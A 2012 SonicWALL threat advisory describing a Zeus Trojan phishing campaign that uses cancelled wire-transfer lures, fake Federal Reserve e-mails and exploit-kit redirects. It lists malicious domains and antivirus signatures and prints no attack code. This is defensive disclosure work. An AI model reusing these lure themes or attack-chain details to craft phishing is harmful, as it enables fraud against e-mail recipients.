Zeus Wire Transfer targeted attacks

May 11, 2012

SonicWALL Threat Research team spotted a wave of Wire Transfer fraud e-mails in the wild starting early morning today. The e-mail notifies the user about a recent wire transaction that was cancelled and asks the user to open the attached HTML file or visit a URL specified in the e-mail body. If the user opens the attached html file or visits the URL inside the e-mail, they will be redirected to a Phoenix Exploit site serving malware.

Below are the sample e-mails we saw from this campaign:

The HTML attachment contains obfuscated JavaScript that connects the user to a remote Phoenix Exploit site, downloads malicious PDF file and upon successful exploit run, it infects the system with a new variant of Zeus P2P Trojan.

Below are some of the domains involved:

  • vanessamiyhome.ru:8080
  • vanishingmasers.ru:8080

While the Phoenix Exploit kit is in action, it displays a fake NACHA page which allows the user to download a report which in reality is the Zeus Trojan:

We also spotted a small number of e-mails which were part of a spear-phishing campaign using the same theme where Corporation's executive staff were targeted. The e-mail pretends to be from Federal Reserve System's Fraud department and contains a URL pointing to a malicious site federalreserve(REMOVED).com. A sample e-mail message looks like:

This phishing site redirects the users to a Blackhole Exploit site serving Zeus Trojan. The initial website is hosted on Amazon's Cloud server and we have notified Amazon's security team about it. The functionality of the Zeus binary involved in both spam campaign is similar to what we saw in a previous SonicAlert- Zeus P2P variant served via spammed Blackhole exploit links (Mar 2, 2012)

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Blacole.gen_2 (Exploit)
  • GAV: Blacole.WR (Exploit)
  • GAV: Zbot.IVT (Trojan)